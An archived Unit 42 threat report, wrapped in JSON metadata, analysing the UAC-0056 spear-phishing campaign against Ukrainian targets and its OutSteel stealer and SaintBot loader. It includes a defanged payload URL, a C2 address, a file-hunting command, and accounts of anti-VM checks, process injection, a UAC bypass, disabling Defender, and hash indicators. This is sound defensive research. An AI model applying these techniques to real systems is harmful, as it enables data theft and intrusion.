{
	"id": "bc0eaf36-c348-4fb4-a408-b85c5bf2fed0",
	"created_at": "2026-04-06T00:13:15.792357Z",
	"updated_at": "2026-04-10T03:37:08.591188Z",
	"deleted_at": null,
	"sha1_hash": "2dcf8a821046d08371dfd07bf2812c8c681d6b68",
	"title": "Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6889834,
	"plain_text": "Spear Phishing Attacks Target Organizations in Ukraine, Payloads\r\nInclude the Document Stealer OutSteel and the Downloader SaintBot\r\nBy Unit 42\r\nPublished: 2022-02-26 · Archived: 2026-04-05 15:32:52 UTC\r\nExecutive Summary\r\nOn Feb. 1, 2022, Unit 42 observed an attack targeting an energy organization in Ukraine. CERT-UA publicly attributed the\r\nattack to a threat group they track as UAC-0056. The targeted attack involved a spear phishing email sent to an employee of\r\nthe organization, which used a social engineering theme that suggested the individual had committed a crime. The email had\r\na Word document attached that contained a malicious JavaScript file that would download and install a payload known as\r\nSaintBot (a downloader) and OutSteel (a document stealer). Unit 42 discovered that this attack was just one example of a\r\nlarger campaign dating back to at least March 2021, when Unit 42 saw the threat group target a Western government entity\r\nin Ukraine, as well as several Ukrainian government organizations.\r\nThe OutSteel tool is a simple document stealer. It searches for potentially sensitive documents based on their file type and\r\nuploads the files to a remote server. The use of OutSteel may suggest that this threat group’s primary goals involve data\r\ncollection on government organizations and companies involved with critical infrastructure. The SaintBot tool is a\r\ndownloader that allows the threat actors to download and run additional tools on the infected system. SaintBot provides the\r\nactors persistent access to the system while granting the ability to further their capabilities.\r\nWhile the OutSteel and SaintBot payloads were common among the attacks, the actors used different social engineering\r\nthemes and infection chains to compromise systems. The actors used current events and other pertinent themes to trick\r\nrecipients into opening documents, clicking links, enabling malicious content or running executables directly to compromise\r\ntheir systems. Early attacks in March and April 2021 used cryptocurrency and COVID themes, while we observed the actors\r\nusing law enforcement-related themes and fake resumes in the May-July 2021 and the February 2022 attacks. The use of law\r\nenforcement-related themes in attacks spanning several months suggests that the threat group favors this social engineering\r\ntheme in the absence of a trending topic or current event.\r\nThe use of email as the attack vector remains the same in all attacks carried out by this threat group. While the spear\r\nphishing emails are a common component, each attack uses a slightly different infection chain to compromise the system.\r\nFor instance, the actors have included links to Zip archives that contain malicious shortcuts (LNK) within the spear phishing\r\nemails, as well as attachments in the form of PDF documents, Word documents, JavaScript files and Control Panel File\r\n(CPL) executables. Even the Word documents attached to emails have used a variety of techniques, including malicious\r\nmacros, embedded JavaScript and the exploitation of CVE-2017-11882 to install payloads onto the system. With the\r\nexception of the CPL executables, most of the delivery mechanisms rely on PowerShell scripts to download and execute\r\ncode from remote servers.\r\nFor more comprehensive information about the Russia-Ukraine crisis, including an overview of known attacks and\r\nrecommendations for how to protect against possible threats, please see our post, “Russia-Ukraine Crisis: How to Protect\r\nAgainst the Cyber Impact.”\r\nPalo Alto Networks customers receive protections against the attacks described via products and services including Cortex\r\nXDR and the WildFire, Advanced URL Filtering and DNS Security security subscriptions for the Next-Generation Firewall.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 1 of 28\n\nAttack Overview\r\nOn Feb. 1, 2022, Unit 42 observed threat actors sending a targeted email to an individual at an energy organization in\r\nUkraine. The email had the following attributes:\r\nFrom: mariaparsons10811@gmail[.]com\r\nSubject: Повідомлення про вчинення злочину (\u003credacted targeted individual’s name\u003e\r\nAttachment: Повідомлення про вчинення злочину (\u003credacted targeted individual’s name\u003e).docx\r\nThe email subject and the filename of the attached document translate from Ukrainian to Report on the commission of a\r\ncrime (\u003credacted targeted individual’s name\u003e). The email suggests that the individual was involved in criminal activity,\r\nwhich is likely part of the actor's social engineering efforts to convince the targeted individual to open the attachment. The\r\nmalicious Word document displays the following contents:\r\nFigure 1. A malicious Word document attached to a spear phishing email sent to a targeted individual at a\r\nUkrainian organization. The apparent redactions were added by the threat actor as a lure to induce the target to\r\nclick icons in the document.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 2 of 28\n\nThe content within the attached document also follows the theme in the delivery email, as it appears to be a redacted\r\ncriminal investigation report from the National Police of Ukraine. The document instructs the user to click the icons with the\r\nexclamation point to display the redacted contents hidden by black bars over the text. Each of the supposedly redacted\r\npieces of content has an icon that, when double-clicked, runs malicious JavaScript (SHA256:\r\nb258a747202b1ea80421f8c841c57438ffb0670299f067dfeb2c53ab50ff6ded) that is embedded within the document. When\r\nthe user double-clicks the icon, Word effectively writes the following file to the system and runs it with Windows Script\r\nHost (wscript):\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\GSU207@POLICE.GOV.UA - Повідомлення (15).js\r\nThe JavaScript file will run the following process that in turn runs a PowerShell script:\r\nFigure 2. PowerShell one-liner.\r\nThe PowerShell one-liner above will download an executable from the following URL, save it to\r\n%PUBLIC%\\GoogleChromeUpdate.exe and execute it:\r\nhxxps://cdn.discordapp[.]com/attachments/932413459872747544/938291977735266344/putty.exe\r\nAccording to CERT-UA, this PowerShell one-liner also appears in another attack attributed to this group that occurred a few\r\ndays earlier on Jan. 31.\r\nBased on our analysis of the payload that this attempted spear phishing attack leads to, which includes the SaintBot\r\ndownloader and the OutSteel document stealer, we suspect that the threat group’s goals for this attack involve exfiltrating\r\ndata from the energy organization.\r\nLinks to Prior Attacks\r\nCERT-UA mentioned that they track this activity using the moniker UAC-0056, while other organizations track this group\r\nwith the names TA471, SaintBear and Lorec53. Our research shows that these attacks have various overlaps with previous\r\nattack campaigns focused on other organizations in Ukraine and Georgia, as well as other nations’ assets local to Ukraine.\r\nThese overlaps involve the use of the SaintBot downloader, shared infrastructure and other common elements. Figure 3\r\nshows a timeline of the known attacks related to this threat group, specifically, the day the spear phishing emails were sent\r\nand the subject line of each email.\r\nFigure 3. A timeline of known attacks related to UAC-0056, showing the date spear phishing emails were sent\r\nand their subject lines.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 3 of 28\n\nThe timeline shows several attacks between April and July 2021. There is then a gap of several months between the 2021\r\nattacks and attacks that have been observed in 2022. This is more likely due to a lack of visibility rather than a pause in\r\nactivity. We believe that the threat group did not pause their activity as we are aware of additional delivery documents and\r\npayloads that suggest additional attacks occurred during the apparently inactive periods on the timeline.\r\nDetails of known prior attacks associated with UAC-0056 are available in Appendix A. Attacks described in the appendix\r\ninclude:\r\nMarch 2021: An attack campaign against targets in Georgia using Bitcoin and COVID themes.\r\nApril 2021: Bitcoin-themed spear phishing emails targeting Ukrainian government organizations.\r\nMay 2021: Law enforcement-themed attacks targeting Ukrainian government organizations.\r\nJune 2021: Law-enforcement themed attack against a Ukrainian government organization\r\nJuly 2021: Spear phishing attempt on a Western government entity in Ukraine.\r\nPayload Analysis for Feb. 2 Attack\r\nAs seen above, the actors leverage Discord’s content delivery network (CDN) to host their payload, which is a common\r\ntechnique that the threat group uses across many of their attacks. The use of Discord benefits threat actors since the\r\npopularity of Discord’s servers for gaming, community groups and other legitimate usage causes many URL filtering\r\nsystems to place a high degree of trust in its domain. Discord’s terms of service do not allow malicious use of its CDN, and\r\nthe company has been working to find and block abuses of its platform.\r\nIn this attack, this URL was hosting a malicious executable (SHA256:\r\nf58c41d83c0f1c1e8c1c3bd99ab6deabb14a763b54a3c5f1e821210c0536c3ff) that is a loader. This acts as the first stage of\r\nseveral in the overall infection chain, each of which have varying levels of complexity. Ultimately, this infection chain\r\nresults in the installation and execution of a document stealer called OutSteel, a loader Trojan called SaintBot, a batch script\r\nturned into an executable that disables Windows Defender and a legitimate Google Chrome installation executable.\r\nInitial Loader\r\nThe executable initially downloaded by the JavaScript in the delivery document is an initial loader Trojan, whose developers\r\nsigned using a certificate (SHA1: 60aac9d079a28bd9ee0372e39f23a6a92e9236bd) that has \"Electrum Technologies GmbH\"\r\nwithin the organization field. This is related to the Electrum Bitcoin wallet, as seen in the following:\r\nCertificate:\r\n    Data:\r\n        Version: 3 (0x2)\r\n        Serial Number:\r\n            3b:11:e7:6e:da:51:82:ce:c2:d4:e7:2d:8c:05:f6:9a\r\n    Signature Algorithm: sha256WithRSAEncryption\r\n        Issuer: C=US, O=thawte, Inc., CN=thawte SHA256 Code Signing CA - G2\r\n        Validity\r\n            Not Before: May 8 00:00:00 2020 GMT\r\n            Not After : May 8 23:59:59 2022 GMT\r\n        Subject: C=DE, ST=Berlin, L=Berlin, O=Electrum Technologies GmbH, CN=Electrum Technologies GmbH\r\nThis first-stage loader is a simple wrapper for the next few stages – these later stages will simply decrypt a DLL from its\r\nresources, before loading it into memory and invoking its entry point.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 4 of 28\n\nFigure 4. Loading decrypted SHCore2.dll and invoking entry point.\r\nThe packer used to pack and obfuscate this initial loader allows a user to clone .NET assemblies from other .NET binaries,\r\nas well as from cloning certificates. This explains how a large portion of the payload is taken from a legitimate library, as\r\nwell as the attached Electrum certificate.\r\nThe decrypted DLL, named SHCore2.dll, is also obfuscated, though interestingly, the obfuscator did not completely strip the\r\nclass names, as can be seen in Figure 5 below. This allows us to quickly gather some information on the functionality of the\r\nsample. While it may seem like the DLL is the final payload, it is merely another stager, which will decrypt and execute a\r\ntotal of four embedded binaries.\r\nFigure 5. SHCore2.dll classes.\r\nThe stager contains some interesting anti-analysis functionality, refusing to execute inside a virtual machine, and in some\r\ncases, on bare metal systems. While that makes it difficult to perform dynamic analysis, before performing any virtual\r\nmachine checks, the sample does call functions within the Class5_Decrypter class, which is responsible for decrypting the\r\nembedded payloads. This allows us to debug the sample and extract those payloads once decrypted.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 5 of 28\n\nFigure 6. Decrypted “config” file in SHCore2.dll memory.\r\nThe four embedded binaries decrypted and executed by the stager include OutSteel, SaintBot, an executable that runs a\r\nbatch script to disable Windows Defender and the Google Chrome installer, as seen in Table 1.\r\nSHA256 Description\r\n7e3c54abfbb2abf2025ccf05674dd10240678e5ada465bb0c04a9109fe46e7ec OutSteel AutoIT file uploader\r\n0da1f48eaa7956dda58fa10af106af440adb9e684228715d313bb0d66d7cc21d\r\nPureBasic executable, used to drop a\r\nDisable Windows Defender batch file\r\n0f9f31bbc69c8174b492cf177c2fbaf627fcdb5ac4473ca5589aa2be75cee735 Legitimate Google Chrome installer\r\n82d2779e90cbc9078aa70d7dc6957ff0d6d06c127701c820971c9c572ba3058e SaintBot .NET Loader\r\nTable 1. Embedded binaries within the loader.\r\nAdditional Files Associated With the Attack\r\nBelow is a more detailed analysis of four additional files that come into play after the initial loader executes.\r\nOutSteel\r\nOutSteel is a file uploader and document stealer developed with the scripting language AutoIT. It is executed along with the\r\nother binaries listed in Table 1. It begins by scanning through the local disk in search of files containing specific extensions,\r\nbefore uploading those files to a hardcoded command and control (C2) server. In this sample, the C2 server it reaches out to\r\nis 185[.]244[.]41[.]109:8080, with the endpoint /upld/.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 6 of 28\n\nFigure 7. OutSteel main file search loop.\r\nScanning is performed through the use of CMD commands, as seen below:\r\ncmd.exe /U /C DIR “\\Users\\Admin\\*.docx” /S /B/ A\r\nThe list of file extensions that OutSteel gathers using the commands above is shown in Table 2, and the choice of these\r\nextensions is likely an attempt to gather potentially sensitive files. These file types include documents for Microsoft Office\r\nsuite applications, Microsoft Access database files, Microsoft Outlook data files and various archive file types.\r\n*.doc *.ppt *.xls *.rtf *.accdb *.pst *.zip *.txt\r\n*.docx .pptx *.xlsx *.dot *.pot *.ppa *.tar\r\n*.pdf *.dot *.csv *.mdb *.pps *.rar *.7z\r\nTable 2. File extensions gathered by OutSteel.\r\nThe command output will be read by the AutoIT payload, and each file will be uploaded to the C2, using the HTTP.au3\r\nlibrary.\r\nOnce the script has finished uploading all relevant files to the C2, it will then attempt to download a file to\r\n%TEMP%\\svjhost.exe from the secondary hardcoded C2 eumr[.]site. The downloaded payload is a sample of the SaintBot\r\n.NET loader, also extracted from the SHCore2 DLL, and if downloaded successfully, will be executed via the command line.\r\nFigure 8. OutSteel downloads SaintBot and executes rmm.bat\r\nThe script comes to a close after creating a .bat file named rmm.bat in the current directory, which will delete itself and the\r\noriginal payload, prior to terminating any running cmd.exe processes.\r\nFigure 9. rmm.bat file contents.\r\nAt this point, the AutoIT script exits, leaving SaintBot residing in memory.\r\nwindows_defender_disable.bat\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 7 of 28\n\nThis batch file is used to disable Windows Defender functionality. It accomplishes this by executing multiple commands via\r\nCMD that modify registry keys and disabling Windows Defender scheduled tasks. This script is open source and available\r\non GitHub, so there is no custom element to this specific sample. This is done to reduce the risk of the dropped payloads\r\nbeing detected by Windows Defender.\r\nFigure 10. windows_defender_disable.bat script.\r\nSaintBot .NET Loader\r\nThe SaintBot .NET loader is also composed of several stages, with varying levels of obfuscation. It begins by executing a\r\nsingle PowerShell one-liner, which results in the execution of cmd.exe, passing the command timeout 20. Once the timeout\r\ncompletes, the loader will resume.\r\nFigure 11. Execution of PowerShell one-liner.\r\nThe first layer of the loader will extract a reversed .NET binary from its resources, before flipping, loading into memory and\r\nexecuting it.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 8 of 28\n\nFigure 12. Reversed binary within resources.\r\nThis secondary layer contains far more obfuscation than the first, also implementing obfuscation through obscurity with\r\naround 140 different classes. Also stored within these classes are several virtual machine and sandbox checks, such as\r\nchecking if Sbiedll.dll is present in the list of loaded modules, comparing the machine name to HAL9TH and the user name\r\nto JohnDoe, and checking the BIOS version for known virtual machine identifiers.\r\nFigure 13. Anti-VM check.\r\nThe quickest way to bypass these checks is to simply set a breakpoint on the Invoke() function and modify any values within\r\nmemory to make sure no matches are discovered by the sample.\r\nOnce all checks have been passed, the second stage of the loader will extract the SaintBot binary from its resources and\r\ndecrypt it. From there, it begins loading in different API calls, including VirtualAllocEx, WriteProcessMemory,\r\nCreateProcessA and SetThreadContext. These calls are used to spawn MSBuild.exe in a suspended state before injecting the\r\ndecrypted SaintBot binary into it, modifying the thread context to point to the malicious entry point and resuming the\r\nprocess.\r\nFigure 14. Loading process injection API.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 9 of 28\n\nSaintBot Payload\r\nSaintBot is a recently discovered malware loader, documented in April 2021 by MalwareBytes. It contains capabilities to\r\ndownload further payloads as requested by threat actors, executing the payloads through several different means, such as\r\ninjecting into a spawned process or loading into local memory. It can also update itself on disk – and remove any traces of\r\nits existence – as and when needed.\r\nSHA-256: e8207e8c31a8613112223d126d4f12e7a5f8caf4acaaf40834302ce49f37cc9c\r\nUpon execution within the MSBuild process, SaintBot will perform several anti-analysis checks, as well as a locale check. If\r\nany of these checks fail, a batch script named del.bat is dropped to the %APPDATA% folder and executed, removing any\r\nSaintBot payload-linked files from the system.\r\nFigure 15. System locale checks.\r\nIf the checks are passed, the payload attempts to locate slideshow.mp4 from the %LOCALAPPDATA%\\zz%USERNAME%\r\npath, where slideshow.mp4 is actually a copy of ntdll.dll. If the file is not found, SaintBot assumes it has not yet been\r\ninstalled on the system and therefore jumps to the installation procedure. This involves creating a directory in the\r\n%LOCALAPPDATA% folder, with the name set to zz%USERNAME%. Then, the local ntdll.dll binary is copied over to the\r\nnewly created folder and renamed to slideshow.mp4. Along with that, a .vbs and .bat script are dropped, named\r\n%USERNAME%.vbs and %USERNAME%.bat. Once the installation routine is complete, the payload executes itself once\r\nagain and exits.\r\nFigure 16. Setting up core SaintBot folders.\r\nIf slideshow.mp4 is discovered on the initial check, it is used to load in the core API provided by ntdll.dll. This is done to\r\navoid any hooks placed on API calls within the original ntdll.dll by EDR/AV software.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 10 of 28\n\nFigure 17. Resolving API through slideshow.mp4.\r\nAt this point, the payload then checks to see if it is running under the process name dfrgui.exe, and if not, it will spawn\r\ndfrgui.exe from the %SYSTEM% directory. This spawned process is then injected into dfrgui.exe using NtQueueApcThread\r\nto resume the process, and the original MSBuild process terminates.\r\nFigure 18. Injection into dfrgui.exe\r\nIf SaintBot is running inside dfrgui.exe, it will confirm whether or not it is running with administrator privileges. If not, it\r\nwill attempt to bypass UAC using fodhelper.exe.\r\nFigure 19. Privilege escalation via fodhelper.exe\r\nPersistence is then set up through the CurrentVersion\\Run registry key, and communication finally begins with the C2\r\nserver. This sample has a total of three C2 servers embedded within it, all reaching out to the same /wp-adm/gate.php\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 11 of 28\n\nendpoint.\r\nFigure 20. Hardcoded C2s.\r\nThis particular sample accepts six total commands from the C2 server:\r\nCommand Purpose\r\nde\r\nde:regsvr32\r\nExecute an EXE or DLL (using regsvr32) via cmd.exe\r\nde:LoadMemory Spawn copy of dfrgui.exe and inject downloaded executable into process \r\nde:LL Download DLL and load into memory with LdrLoadDll()\r\nupdate Update SaintBot binary\r\nuninstall Uninstall SaintBot from machine\r\nTable 3. SaintBot commands.\r\nConclusion\r\nUnit 42 research discovered a threat group targeting an energy organization that is part of Ukraine’s critical infrastructure.\r\nThis attack is part of a year-long campaign of attacks that not only targeted Ukrainian government organizations, but also\r\nforeign nations’ embassies in Ukraine. The threat group delivered a malicious payload called OutSteel that is capable of\r\nautomatically exfiltrating various types of files, including documents, archives, database files and files containing email-related data. Based on the list of targeted organizations and the use of a file exfiltration tool, we believe this threat group’s\r\nprimary goal is to steal sensitive information for the purpose of situational awareness and leverage in dealing with Ukraine.\r\nFor Palo Alto Networks customers, our products and services provide the following coverage associated with this campaign:\r\nCortex XDR protects endpoints from the SaintBot malware described in this blog.\r\nWildFire cloud-based threat analysis service accurately identifies the malware described in this blog as malicious.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 12 of 28\n\nAdvanced URL Filtering and DNS Security identify domains associated with this attack campaign as malicious.\r\nUsers of the AutoFocus contextual threat intelligence service can view malware associated with these attacks using the\r\nSaintBot, SaintBot_Loader and OutSteel tags.\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber\r\nThreat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to\r\nsystematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nAdditional Resources\r\nA deep dive into SaintBot, a new downloader\r\nTargeted Phishing Attack Against Ukrainian Government Expands to Georgia\r\nSpearphising Attack Uses COVID 21 Lure to Target Ukrainian Government\r\nCERT-UA Post from July 13, 2021\r\nCERT-UA Post from Feb. 2, 2022\r\nRussia-Ukraine Crisis: How to Protect Against the Cyber Impact\r\nRussia-Ukraine Crisis Briefings: How to Protect Against the Cyber Impact\r\nPalo Alto Networks Resource Page: Protect Against the Cyber Impact of the Russia-Ukraine Crisis\r\nIndicators of Compromise\r\nDelivery Hashes\r\n07ed980373c344fd37d7bdf294636dff796523721c883d48bb518b2e98774f2c\r\n0be1801a6c5ca473e2563b6b77e76167d88828e1347db4215b7a83e161dae67f\r\n0db336cab2ca69d630d6b7676e5eab86252673b1197b34cf4e3351807229f12a\r\n0f13f5f9a53a78fc4f528e352cd94929ae802873374ffb9ac6a16652bd9ea4c5\r\n101d9f3a9e4a8d0c8d80bcd40082e10ab71a7d45a04ab443ef8761dfad246ca5\r\n1092d367692045995fab78ba1b9b236d5b99d817dd09cba69fd3834e45bd3ddf\r\n10d21d4bf93e78a059a32b0210bd7891e349aabe88d0184d162c104b1e8bee2e\r\n14bde11c50a2df2401831fea50760dd6cf9a492a3a98753ab3b1c6ce4d079196\r\n157b05db61aaf171823c7897a2f931d96a62083a3ad6014cb41c6b42694a0c2f\r\n172f12c692611e928e4ea42b883b90147888b54a8fb858fc97140b82eef409f3\r\n275388ffad3a1046087068a296a6060ed372d5d4ef6cf174f55c3b4ec7e8a0e8\r\n276ac9b9fe682d76382ec6e5bc3d1d045ce937438f92949c23453468eb62a143\r\n2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d\r\n2c879f5d97f126820f1fbf575df7e681c90f027062b6bcb3451bb09607c922da\r\n2ec710d38a0919f9f472b220cfe8d554a30d24bfa4bdd90b96105cee842cf40d\r\n33a4655fd61e471d8956bc7681ee56a9926da91df3583b79e80cb26a14e45548\r\n35180c81ebcefbc32c2442c683cab6fd299af797a0493d38589d5c5d1d6b5313\r\n354868cd615a0377e0028bcaee422c29f6b6088b83a0b37a32e00cce5dba43f9\r\n434d39bfbcee378ed62a02aa40acc6507aa00b2a3cb0bf356c0b23cc9eebcd77\r\n461eeadbe118b5ad64a62f2991a8bd66bdcd3dd1808cd7070871e7cc02effad7\r\n4fcfe7718ea860ab5c6d19b27811f81683576e7bb60da3db85b4658230414b70\r\n52173598ca2f4a023ec193261b0f65f57d9be3cb448cd6e2fcc0c8f3f15eaaf7\r\n5227adda2d80fb9b66110eeb26d57e69bbbb7bd681aecc3b1e882dc15e06be17\r\n5cda471f91413a31d3bc0e05176c4eb9180dfcac3695b83edd6a5d4b544fe3f1\r\n5d8c5bb9858fb51271d344eac586cff3f440c074254f165c23dd87b985b2110b\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 13 of 28\n\n5d9c7192cae28f4b6cc0463efe8f4361e449f87c2ad5e74a6192a0ad96525417\r\n5dabf2e0fcc2366d512eda2a37d73f4d6c381aa5cb8e35e9ce7f53dae1065e4a\r\n63d7b35ca907673634ea66e73d6a38486b0b043f3d511ec2d2209597c7898ae8\r\n64057982a5874a9ccdb1b53fc15dd40f298eda2eb38324ac676329f5c81b64e0\r\n677500881c64f4789025f46f3d0e853c00f2f41216eb2f2aaa1a6c59884b04cc\r\n68313c90ca8eb0d5fc5e63e2b0f7a5f4d1fe15f825fe8ca0b4b3e922a253caa7\r\n84e651b2d55a75ec59b861b11a8f8f7cb155ed81604081c95dd11b8aec5b31b1\r\n882597c251905f9be31352ba034835764124c9a9e25ef1ba0150e5998c621f07\r\n891f526fea4d9490a8899ce895ce86af102a09a50b40507645fee0cf2ab5bef5\r\n8bb427b4f80fe1ede3e3ed452d9f0a4ce202b77cda4ad2d54968ab43578e9fa9\r\n8c8ef518239308216d06b4bf9b2771dbb70759cb1c9e6327a1cd045444f2b69a\r\n90ce65b0b91df898de16aa652d7603566748ac32857972f7d568925821764e17\r\n92af444e0e9e4e49deda3b7e5724aaecbb7baf888b6399ec15032df31978f4cf\r\n96f815abb422bb75117e867384306a3f1b3625e48b81c44ebf032953deb2b3ff\r\n9803e65afa5b8eef0b6f7ced42ebd15f979889b791b8eadfc98e7f102853451a\r\na16e466bed46fcf9c0a771ca0e41bc42a1ac13e66717354e4824f61d1695dbb1\r\na356be890d2f48789b46cd1d393a838be10bdea79f12a10b1adf1d78178343c5\r\na60f4a353ea89adc8def453c8a1e65ea2ecc46c64d0d9ea375ca4e85e1c428fd\r\nb7c6b82a8074737fb35adccddf63abeca71573fe759bd6937cd36af5658af864\r\nb89a71c9dbc9492ecb9debb38987ab25a9f1d9c41c6fbc33e67cac055c2664bc\r\nc9761f30956f5ba1ac9abc8b000eae8686158d05238d9e156f42dd5c17520296\r\nd99f998207c38fe3ab98b0840707227af4d96c1980a5c2f8f9ac7062fab0596d\r\ndfe11b83da7c4dc02ff7675d086ff7ddd97fec71c62cc96f1a391f574bec6b4f\r\ne39a12f34bb8a7a5a03fd23f351846088692e1248a3952e488102d3aea577644\r\nf0d99b7056dac946af19b50e27855b89f00550d3d8dc420a28731814a039d052\r\nf69125eafdd54e1aae10707e0d95b0526e80b3b224f2b64f5f6d65485ca9e886\r\nf6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166\r\nfbe13003a4e39a5dea3648ee906ea7b86ed121fd3136f15678cf1597d216c58a\r\nPayload Hashes\r\n005d2d373e7ba5ee42010870b9f9bf829213a42b2dd3c4f3f4405c8b904641f2\r\n0222f6bdfd21c41650bcb056f618ee9e4724e722b3abcd8731b92a99167c6f8d\r\n0c644fedcb4298b705d24f2dee45dda0ae5dd6322d1607e342bcf1d42b59436c\r\n0e1e2f87699a24d1d7b0d984c3622971028a0cafaf665c791c70215f76c7c8fe\r\n0f7a8611deea696b2b36e44ea652c8979e296b623e841796a4ea4b6916b39e7c\r\n0fc7154ebd80ea5d81d82e3a4920cb2699a8dd7c31100ca8ec0693a7bd4af8b7\r\n137fc4df5f5cad2c88460314e13878264cc90d25f26b105bb057f6bfdca4cbf2\r\n17c3cf5742d2a0995afb4dd2a2d711abe5de346abde49cf4cf5b82c14e0a155f\r\n187e0a02620b7775c2a8f88d5b27e80b5d419ad156afc50ef217a95547d0feaa\r\n18f24841651461bd84a5eac08be9bce9eab54b133b0e837d5298dac44e199d5f\r\n1a1fe7b6455153152037668d47c7c42a068b334b91949739ed93256d5e3fbd89\r\n1e6596320a3fa48d8c13609a66e639b35fb1e9caae378552956aa9659809162b\r\n2762cbc81056348f2816de01e93d43398ba65354252c97928a56031e32ec776f\r\n27868ae50b849506121c36b00d92afe3115ce2f041cc28476db8dfc0cc1d6908\r\n2bef4a398a88749828afac59b773ae8b31c8e4e5b499aad516dd39ada1a11eca\r\n2d9d61ce6c01329808db1ca466c1c5fbf405e4e869ed04c59f0e45d7ad12f25b\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 14 of 28\n\n3075a467e89643d1f37e9413a2b38328fbec4dd1717ae57128fdf1da2fe39819\r\n320d091b3f8de8688ce3b45cdda64a451ea6c22da1fcea60fe31101eb6f0f6c2\r\n37be3d8810959e63d5b6535164e51f16ccea9ca11d7dab7c1dfaa335affe6e3d\r\n39e8455d21447e32141dc064eb7504c6925f823bf6d9c8ce004d44cb8facc80b\r\n3d7a05e7ba9b3dd84017acab9aab59b459db6c50e9224ec1827cbf0a2aee47db\r\n3f7b0d15f4cbe63e57fb06b57575bf6dd9eb777c737b0886250166768169fc6c\r\n4715a5009de403edd2dd480cf5c78531ee937381f2e69e0fb265b2e9f81f15c4\r\n494122ff204f3dedaa8f0027f9f98971b32c50acbcce4efa8de0498efa148365\r\n4c8a433ed99cc4b6994b2e1df59eb171f326373ba100a3653eb37e8a8ee2e6f2\r\n4d59a7739f15c17f144587762447d5abb81c01f16224a3f7ce5897d1b6f7ee77\r\n4ee84419fb9267081480954f1be176095a45fe299078dfa95f980e513b46a020\r\n4fdc37f59801976606849882095992efecee0931ece77d74015113123643796e\r\n506c90747976c4cc3296a4a8b85f388ab97b6c1cfae11096f95977641b8f8b6f\r\n56731c777896837782beff4432330486a941e4f3af44b4d24be7c62c16e96256\r\n5fc108db5114be4174cb9365f86a17e25164a05cc1e90ef9ee29ab30abed3a13\r\n619393d5caf08cf12e3e447e71b139a064978216122e40f769ac8838a7edfca4\r\n61f5e96ec124fef0c11d8152ee7c6441da0ea954534ace3f5f5ec631dd4f1196\r\n6a698edb366f25f156e4b481639903d816c5f5525668f65e2c097ef682afc269\r\n6ee2fd3994acdbb9a1b1680ccd3ac4b7dcb077b30b44c8677252202a03dccf79\r\n700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901\r\n707971879e65cbd70fd371ae76767d3a7bff028b56204ca64f27e93609c8c473\r\n71e9cc55f159f2cec96de4f15b3c94c2b076f97d5d8cecb60b8857e7a8113a35\r\n7419f0798c70888e7197f69ed1091620b2c6fbefead086b5faf23badf0474044\r\n750c447d6e3c7d74ccab736a0082ef437b1cd2000d761d3aff2b73227457b29c\r\n75f728fa692347e096386acd19a5da9b02dca372b66918be7171c522d9c6b42d\r\n7963f8606e4c0e7502a813969a04e1266e7cd20708bef19c338e8933c1b85eda\r\n7b3d377ca2f6f9ea48265a80355fe6dc622a9b4b43855a9ddec7eb5e4666a1d4\r\n7d7d9a9df8b8ffd0a0c652a3d41b9a5352efb19424e42942aaf26196c9698019\r\n7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8\r\n7eb1dc1719f0918828cc8349ee56ca5e6bbde7cada3bc67a11d7ff7f420c7871\r\n7ee8cfde9e4c718af6783ddd8341d63c4919851ba6418b599b2f3c2ac8d70a32\r\n82d2779e90cbc9078aa70d7dc6957ff0d6d06c127701c820971c9c572ba3058e\r\n89da9a4a5c26b7818e5660b33941b45c8838fa7cfa15685adfe83ff84463799a\r\n8ab3879ed4b1601feb0de11637c9c4d1baeb5266f399d822f565299e5c1cd0c4\r\n9528a97d8d73b0dbed2ac496991f0a2eecc5a857d22e994d227ae7c3bef7296f\r\n975f9ce0769a079e99f06870122e9c4d394dfd51a6020818feeef9ccdb8b0614\r\n9917c962b7e0a36592c4740d193adbd31bc1eae748d2b441e77817d648487cff\r\n9a72e56ac0f1badd3ca761b53e9998a7e0525f2055dbec01d867f62bdb30418e\r\n9cf4b83688dd5035623182d6a895c61e1e71ea02dc3e474111810f6641df1d69\r\n9d7c3463d4a4f4390313c214c7a79042b4525ae639e151b5ec8a560b0dd5bd0a\r\n9ec80626504ca869f5e731aef720e446936333aaf6ab32bae03c0de3c2299f34\r\n9ee1a587acaddb45481aebd5778a6c293fe94f70fe89b4961098eb7ba32624a8\r\n9ef2d114c329c169e7b62f89a02d3f7395cb487fcd6cff4e7cac1eb198407ba6\r\n9fbeb629ea0dc72ac8db680855984d51b28c1195e48abff2e68b0228f49d5b0f\r\na61725f3b57fd45487688ad06f152d0db139a6cb29f